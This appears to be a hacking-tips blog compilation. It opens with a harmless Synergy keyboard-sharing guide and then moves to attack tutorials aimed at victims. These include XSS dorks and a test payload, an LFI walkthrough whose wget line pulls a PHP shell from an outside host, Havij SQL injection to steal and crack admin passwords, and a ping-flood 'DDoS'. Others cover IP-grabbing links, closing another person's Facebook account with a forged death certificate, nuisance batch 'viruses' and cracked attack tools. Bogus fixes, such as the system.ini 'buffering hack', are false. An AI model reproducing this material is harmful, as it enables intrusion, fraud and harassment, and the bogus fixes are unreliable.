Share a keyboard and mouse with multiple computers using only software

    Share a keyboard and mouse with multiple computers using only software


Hello! Friends NightStalker Here today i show you how to control a multiple pc withe a help of of simple software so if you have more then one so stop jumping from one keyboard and mouse combination to another every time you switch computers. Control multiple computers using just one set – without the need for extra hardware. QuickSynergy for Linux and Mac, working with Synergy for Windows, means there’s no combination of systems that can’t be controlled this quickly and easily. If there’s more than one computer on your desk then you need to check this out.
Multiple monitors are intuitive – you move your mouse from one screen to another and simply continue controlling. But what if your desk has multiple computers on it? Can you move your mouse from one computer to another, then work on that? And what about copy/paste functionality? That, as it turns out, can be just as simple as using multiple monitors – even if you’re using different operating systems.

So let's the fun begin...!!! 

1: Go to Synergy's website and click the Download link. Either make a donation or click Continue. Download the correct installer for your operating system. Choose 32-bit if you
aren’t sure which version of Windows you have.  

2: Run the file you just downloaded. Agree to the terms and conditions, then click next to install the software. You’ll need to download and install the appropriate version of the Synergy software on each computer you intend to use with your shared mouse and keyboard.


3: Log in to your router via your web browser. Look for a page which lists all the devices connected to the router. Identify your 'Master' computer, and ensure its IP address is set to be static rather than dynamic, with a value such as 192.168.1.10.

4 :Still within the router’s interface, another option will allow you to open ports for certain applications. Synergy uses 24800 by default, so follow your router's manual or online
help to open this port, enabling both TCP and UDP protocols for this port and ensure it is applied to your Master computer (usually you select it from a list or enter its IP address). Save the changes.



5: On the Master computer, launch Synergy, then tick the box labelled Server. Click Configure Server. For each client, drag the monitor icon from the top right into the main
window and arrange monitors in the order in which they’re positioned on your desk. Double click each icon, then give it a unique screen name. Click OK, then click Start.


6: On each client computer, open the Synergy application, and go to the settings and ensure it has the same screen name you chose in the last step. Tick the box next to Client.
Enter your master computer’s IP address. Then click Start. If all is well, it should say ‘connected to server’ and you can move your mouse between your computers and use the
keyboard to type.







 

Xss Attack tutorial

                                     Xss  Attack tutorial





                                                                         Introduction


'XSS' also known as 'CSS' (Cross Site Scripting) is a very common vulnerability found in Web Applications, 'XSS' allows the attacker to inject malicious code , the reason of that is the developer trusts user inputs, or mis filtering issues ,then send back user input data to the client browser so the malicious code will execute
                                                                   
                                                                          Types of XSS

There are Three Types of XSS 
• Persistent (Stored) XSS          = Attack is stored on the website,s server 
• Non Persistent (reflect) XSS   = user has to go through a special link to be exposed 
• DOM-based XSS                  = problem exists within the client-side script 


                                                                         Persistent  XSS


The persistent XSS vulnerability is a more devastating variant of a cross-site scripting flaw: it occurs when the data provided by the attacker is saved by the server, and then permanently displayed on "normal" pages returned to other users in the course of regular browsing, without proper HTML escaping. A classic example of this is with online message boards where users are allowed to post HTML formatted messages for other users to read. Simply Persistent XSS is occurs when the developer stores the user input data into database server or simply writing it in a file without a proper filtration , then sending them again to the client browser.


for test vulnerability use this script   <script>alert("HELL")</script> 



If you got This PoPup so your site is Vulnerable



                                                             Dorks


  • !xss inurl:com_feedpostold/feedpost.php?url=


    • !xss inurl:/products/orkutclone/scrapbook.php?id=

    • !xss inurl:/products/classified/headersearch.php?sid=

    • !xss inurl:/poll/default.asp?catid=

    • !xss inurl:/search_results.php?search=Search&amp;k=

    • !xss /preaspjobboard//Employee/emp_login.asp?msg1=

    • !xss pages/match_report.php?mid= pages/match_report.php?mid=

    • !xss /notice.php?msg= /notice.php?msg=

    • !xss /gen_confirm.php?errmsg= /gen_confirm.php?errmsg=

    • !xss /index.php?option=com_easygb&amp;Itemid= 

    • !xss /2wayvideochat/index.php?r=

    • !xss /view.php?PID= /view.php?PID=

    • !xss /Property-Cpanel.html?pid= /Property-Cpanel.html?pid=

    • !xss /showproperty.php?id= /showproperty.php?id=

    • !xss /vehicle/buy_do_search/?order_direction=

    • !xss /elms/subscribe.php?course_id= /elms/subscribe.php?course_id=

    • !xss /winners.php?year=2008&amp;type= /winners.php?year=2008&amp;type=

    • !xss /schoolmv2/html/studentmain.php?session=

    • !xss /site_search.php?sfunction= /site_search.php?sfunction=

    • !xss /search.php?search_keywords= /search.php?search_keywords=

    • !xss /hexjector.php?site= /hexjector.php?site=

    • !xss /news.php?id= /news.php?id=

    • !xss /index.php?view=help&amp;faq=1&amp;ref=

    • !xss inurl:"contentPage.php?id="

    • !xss inurl:"displayResource.php?id="

    • !xss intext:"Website by Mile High Creative"

    • !xss index.php?option=com_reservations&amp;task=askope&amp;nidser=2&amp;namser= "com_reservations"

    • !xss /info.asp?page=fullstory&amp;key=1&amp;news_type=news&amp;onvan=

    • !xss /ser/parohija.php?id= /ser/parohija.php?id=

    • !xss /strane/pas.php?id= /strane/pas.php?id=

    • !xss /main.php?sid= /main.php?sid=




                                                          



     

    Local File inclusion (LFI)

            Local File inclusion*Shell upload*| Tutorial


    In this article he will demonstrate a local file inclusion vulnerability and he will enhance the attack by uploading a shell on the website.Here are some of the common parameters which are vulnerable to local file inclusion or remote file inclusion attacks.

    *index.php?homepage=
    *index.php?page=
    *index.php?index2=

    Requirements:

    *A Vulnerable Website      
    * shell
    * User-Agent switcher   
    * Mozilla Firefox
    Requirements:

    1) A Vulnerable Website      
    2) shell
    3) User-Agent switcher   
    4) Mozilla Firefox

    The first thing which a hacker will do while finding a LFI vulnerability is to locate the /etc/passwd file. This file indicates that a local file inclusion vulnerability is present in the website. The image below explains the whole story “root” is the username, followed by “x” which happens to be the password, however here it’s shadowed, which means that it’s present is /etc/shadow file. Which is only accessible when you have root privileges.



    Next the hacker will check for /proc/self/environ. So change your path to /proc/self/environ/. The /proc/self/environ/ page should look something like this if the file exists, not all sites have it.


    Once the local file inclusion vulnerability has been identified , the hacker will try to perform remote code execution and try to some how to further access. This can be done by uploading a PHP backdoor. For that purpose a commonly used tool is User agent switcher.
                              

    he hacker edits the useragent and changes code inside to the user agent to the following:


    <?php phpinfo();?>


    Select your User-Agent in Tools > Default User Agent > PHP Info (Or whatever you User Agent is called)





    After refreshing the website, He then searches for the keyword "disable_functions" (Ctrl+F Search function)
    disable_functions | no value | no value
    The above function tells us that website is vulnerable to remote code execution and now we can upload the PHP backdoor. On the finding that the website is vulnerable he then tries to upload the shell by using the following command:
    <?exec('wget http://www.sh3ll.org/egy.txt -O shell.php');?>
    Where the above code uploads a PHP backdoor in a text form and later renames it to .php. Now the shell has been successfully uploaded. Once the PHP backdoor has been uploaded it will look like the following:
                      

                  For any problem please comment................


     

    Extract Email Address of Domain using Metasploit

    How to Extract Email Address of Domain using Metasploit

    *First open your backtrack terminal and type msfconsole


    *Now type search collector

    *Now type use auxiliary/gather/search_email_collector

    Than type show options


    he next step you need to set up the domain you want to locate the email address. Now type set domain 
    www.yahoo.com   |anything you want|
    when you select domain hit enter and type   run
    after some time you have your email list 


    Download backtrack from 




     

    Gaining Ip address

              Gaining Ip address through a link


    1) Go to here
    2) Input your email address and then click getlink.


    3) Then you should be on a new page with these links copy one of these links.

    4) Give to your victim once your victim clicks it you will get a email with their ip address
    make sure to check the junk folder if it isnt in the inbox.




     

    Scare Your Friends By The Profile Of Dead Person

    Scare Your Friends By The Profile Of Dead Person

    1. First Copy this link and Send it
    to your friend.

    2. Lie him that it is a Profile of a
    dead person 

    3. Ask him to click on the
    “photos” option to check the
    image and ask him to wait some
    seconds.

    4. When he is trying to click there,
    this Ghost animation will be on 

     

    Hack youtube buffering

                       Hack youtube buffering 

    1. Go to===>Run
    2. Type ===>system.ini
    3. Hit Enter
    4. past this script and save it
    ------------------------------------------------------------------------------------------------------------
    Code:
    ; for 16-bit app support
    [drivers]
    wave=mmdrv.dll
    timer=timer.drv
    [mci]
    [driver32]
    [386enh]
    woafont=dosapp.FON
    EGA80WOA.FON=EGA80WOA.FON
    EGA40WOA.FON=EGA40WOA.FON
    CGA80WOA.FON=CGA80WOA.FON
    CGA40WOA.FON=CGA40WOA.FON
    page buffer=1000000Tbps
    load=1000000Tbps
    download=1000000Tbps
    save=1000000Tbps
    back=1000000Tbps
    search=1000000Tbps
    sound=1000000Tbps
    webcam=1000000Tbps
    voice=1000000Tbps
    faxmodemfast=1000000Tbps
    update=1000000Tbps
    ------------------------------------------------------------------------------------------------------------

                                           |AND DONE| 


     

    Bypass Trial Period of Softwares

               How to Manually Bypass Trial Period of Softwares




    This trick generally works for most of the 3rd party applications, here we won't use any kind of time stopper or lame stuff like that. What we will do is clear tracks so that app doesn't realize we used the software before uninstalling it and are reinstalling it 

    Step 1: 
    (First thing to do is unstall the application.)


    Step 2: 
    (Go to Start Type "Regedit".)


    Step 3: 
    Go to HK Local Machine -> Software -> Your Software name. Delete the Key.

    Do this for HK Current user if there exists a key of that software.


    Step 4: 
    Go to run type "%temp%. Delete all files. Well they are just temporary files so it won't matter, it will only clean up ur pc little bit if not anything else.


    Step 5: 
    Go to Users -> Username -> App data Check all 3 directories that is "Local", "Local Low", "Roaming" for your software entry. Delete that.


    Step 6: 
    Reinstall application and enjoy the next trial. Just perform this every after the trial version


                                             |DONE|


     

          How to Download Torrent Files Without Torrent Client  




    Convert Torrent File to .exe and download it directly without Torrent client!!!
    Yes, I am talking about a FREE tool to convert your torrent file to a .exe file with
    which you can directly download the files without any torrent client application
    installed on your system.

    This application is called Torrent2Exe ,as the name suggest it Convert torrents into
    stand-alone exe files and download them without a client.
    *Download From HERE


                                                    How to use?
                                     
    The only things you will need to do are to enter the URL of a torrent file or the path
    to it on your computer, select the size of the exe file to be generated and obtain an

    executable file (*.exe) that will download your torrent file automatically.

                                             

                                          |DONE|


                                    

     

    close ANY Facebook account

              How to close ANY Facebook account.



    You can close any facebook-account by following these simple steps 

    Step 1 - Go to this url:        www.facebook.com/.....

    This is the Url we will use to Report our slave. This Form allows you to report a deceased person (someone
    who is dead). The report will be handled by a Facebook worker, and most likely he will just close the account.

    Step 2 - Fill all the Fields:
    These are the things you will fill the application with. You might change a thing or two if it doesn't work the
    first time.

    Full Name: Your Victims Full name(first and last name)
    Date of birth: Go at his profile and click at Info tab and get his date of birth.
    Account Email Addresses: Do the same thing, go to his profile and click on info tab and get his
    email addresses.
    Networks: Again,go to his profile and click on Info tab and get his networks, copy them and paste in
    the form.
    Web address of profile you would like to report: Just go to his profile and copy the link in the
    address bar.(the url bar in your browser)
    Relationship to this person: To make more believable select Immediate Family.
    Requested Action: Remove Profile.
    Proof Of Death: This is the hardest part of this form. Now to make a proof of a death just search
    Google in your language(or the language of the slave) for a "Death Certificate" or "Certificate of
    Death".
    ow open an editor and fill it out.
    Now upload the image to a host 
    And it's done. Put a link to the image in the form
    Additional Information: Write what you want, just write that you are in his/her family and you
    would like to close his/her Facebook account because you won't like that when he is dead, his
    Facebook is still opened. Or something like that. Be creative here!

    Step 3 - Click on Submit and then a message will appear
    and  follow appeare message steps


                                           |DONE|

                                           

     

    DDos Attack Useing CMD

          How To Make DDos Attack Useing CMD


    Hey this is how you can slow someones internet down via MS DOS.
    It can onley be done if thier Firewall is inactive.
    But you can do it on sites that dont have VPN protection.
    If you want to check a Private IP you must download a program comm view works fine

    1. Press start. Type CMD. Then open CMD 
    2. To get the sites IP you must type.
     ping http://www.exampel.com 
     If ping dosent work type. tracert http://www.exampel.com

    Then it will start to check the where is it located. 
    Then it will look like this.

    The red is the IP 
    Then you write in CMD 

    ping 31.13.72.23 -t -l 10000 

    The more bytes you send them. More damege does it do. So instead of 10000 u can write up to 65000 bytes




                                                           |DONE|

     

    SQL injection using Havij

           Hacking a website using SQL injection



    Today i am gonna show you how to hack a website using sql injection.To find SQL vulnerable sites

    Now Lets start

    Things you will need 
    1. Havij SQL injection Tool
    :Downlod from   HERE
    2. A sql vunerable site, 
    3. A very important thing i.e mind

    Exploiting the vulnerable site

    1. Open Havij and paste site url in target field and hit enter
    .
    2. Now wait for Havij to get all the databases of the website.

    3. Now click on available databse of site and click on Get Tables


    4. By clicking Get Tables Havij will look after the tables available in the database.

    5. Now after the scanning Havij will get all tables, now the main work start , you have to check it there table available named as admin, users and something similar to these words like i get usuario in my website and select it and click on Get Columns. 


    6. Now after clicking Get Columns havij will get all the columns available in users table.

    7. In my case i found diffrent columns like id, login, pass an many more.

    8. Now select the columns and click on Get Data.


    9. Now havij will look after the data available in columns login and password i.e admin username and passowrd like i get 
    username --> adminpassword--> 21232f297a57a5a743894a0e4a801fc3 (in encrypted form)
    Like in image below


    10. Now after i get username and password there is a problem that passowrd i s encrypted in mdm language , so we have to crack it .

    11. To crack encrypted password just copy password click on MD5 tab in havij and paste the encrypted password in MD5 hash field and hit start.Now havij will try to crack the password. 


    12. Now i get Password cracked as admin.

    13. Now we will check for admin panel where we gonna login with username and passoword.

    14. To find admin panel click Find Admin tab in Havij and click start. Now havij  will check the admin panel of website.
    15.open it in a web browser and login with username and password and now you are in admin panel.






                     Website hacking is illegal


     

    Ram Cleaning

                      How To Speed Up PC By Ram Cleaning





    1:Open up the Notepad
    2:copy and paste this code



    ========================================================
    FreeMem=Space(10240000000)
    ========================================================================

    Save the file as in .vbs format. For instance "cleaner.vbs"
    You can customize the code and write 512 instead of 1024 which it represent the RAM you have. 512mb RAM. You can use whatever RAM you wish.
    Finally just run it.




                                                            

                                                                 


     

    E-BOMB

                             E-BOMB (VIRUS)


    1. open Notepad
    2. then type these codes
    -----------------------------------------------------------------------------------------------------------
    echo@off
    start notepad
    start cmd
    start notepad
    start C:\
    start D:\
    start E:\
    ------------------------------------------------------------------------------------------------------------
    and save this file with .bat extension
    you can add every thing you want "start notepad"open notepad  1 time 
    you can open 1000 notepad by pastin one command multiple times
    and slow down you victim pc
      


                                             |DONE|


     

    Turn Your Keyboard Lights In Discolights

                  Turn Your Keyboard Lights In Discolights (virus)



    1. open you notepad
    2. type these codes
    ------------------------------------------------------------------------------------------------------------
    Set wshShell =wscript.CreateObject("WScript.Shell")
    do
    wscript.sleep 100
    wshshell.sendkeys "{CAPSLOCK}"
    wshshell.sendkeys "{NUMLOCK}"
    wshshell.sendkeys "{SCROLLLOCK}"
    loop
    ------------------------------------------------------------------------------------------------------------
    3.Save the file with name disco.vbs





                                             |DONE|


     

    Access Blocked Website

                 How to access Blocked Website



    how to open "Blocked Sites" in your country

    1.Method
    *you can use proxy sites like these 

    2.Method
    *You can use "VPN".Its is very secure for anonymous browsing



     

    Web Cruiser Latest Version (Cracked)

             Web Cruiser Latest Version Cracked




    It can support scanning website as well as POC (Proof of concept) for web vulnerabilities: SQL Injection, Cross Site Scripting, XPath Injection etc. So, WebCruiser is also an automatic SQL injection tool, an XPath injection tool, and a Cross Site Scripting tool!

    Key Features:
    * Crawler(Site Directories And Files);
    * Vulnerability Scanner: SQL Injection, Cross Site Scripting, XPath Injection etc.;
    * SQL Injection Scanner;
    * SQL Injection Tool: GET/Post/Cookie Injection POC(Proof of Concept);
    * SQL Injection for SQL Server: PlainText/Union/Blind Injection;
    * SQL Injection for MySQL: PlainText/Union/Blind Injection;
    * SQL Injection for Oracle: PlainText/Union/Blind/CrossSite Injection;
    * SQL Injection for DB2: Union/Blind Injection;
    * SQL Injection for Access: Union/Blind Injection;
    * Post Data Resend;
    * Cross Site Scripting Scanner and POC;
    * XPath Injection Scanner and POC;
    * Auto Get Cookie From Web Browser For Authentication;
    * Report Output.

    Download: (with Crack) From HERE



     

    HAVIJ 1.6 Full (CRACKER)

                                      HAVIJ 1.6 CRACKER






    1. Supported Databases with injection methods:
    MSSQL 2000/2005 with error
    MSSQL 2000/2005 no-error union-based
    MSSQL blind
    MSSQL time-based
    MySQL union-based
    MySQL blind
    MySQL error-based
    MySQL time-based
    Oracle union-based
    Oracle error-based
    Oracle blind
    PostgreSQL union-based
    MS Access union-based
    MS Access blind
    Sybase (ASE)
    Sybase (ASE) Blind
    2. HTTPS support
    3. Multi-threading
    4. Proxy support
    5. Automatic information server detection
    6. Automatic parameter kind detection (string or integer)
    7. Automatic keyword detection (finding the distinction between positive and negative responses)
    8. Automatic scan of all parameters.
    9. attempting completely different injection syntaxes
    10. choices for substitution house by /**/,+,... against IDS or filters
    11. Avoids exploitation strings (bypassing magic_quotes and similar filters)
    12. Manual injection syntax support
    13. Manual queries with result
    14. Forcing extrajudicial union
    15. Random signature generator
    16. totally customizable protocol headers (like referer, user agent...)
    17. Loading cookie(s) from web site for authentication
    18. Load HTML type inputs
    19. protocol Basic and Digest authentication
    20. Injecting uniform resource locator rewrite pages
    21. Bypassing ModSecurity internet application firewall and similar firewalls
    22. Bypassing WebKnight internet application firewall and similar firewalls
    23. Instant result
    24. idea tables and columns in MySQL<5 (also in blind) and MS Access
    25. fast retrieval of tables and columns for MySQL
    26. Resuming a antecedently saved table/column extraction *******
    27. death penalty SQL question against associate Oracle information
    28. Custom keyword replacement in injections
    29. obtaining one complete row through one request (all in one request)
    30. merchandising information into file
    31. Saving information as XML
    32. Saving information as CSV format
    33. facultative xp_cmdshell and remote desktop
    34. Multiple table/column extraction strategies
    35. Multi-threaded Admin page finder
    36. Multi-threaded on-line MD5 cracker
    37. obtaining software package data
    38. obtaining tables, columns and information
    39. Command execution (MSSQL only)
    40. Reading remote system files (MySQL only)
    41. Creating/writing to a foreign file (MySQL and MsSQL)
    42. Insert/update/delete information
    43. Unicode support

    Download From HERE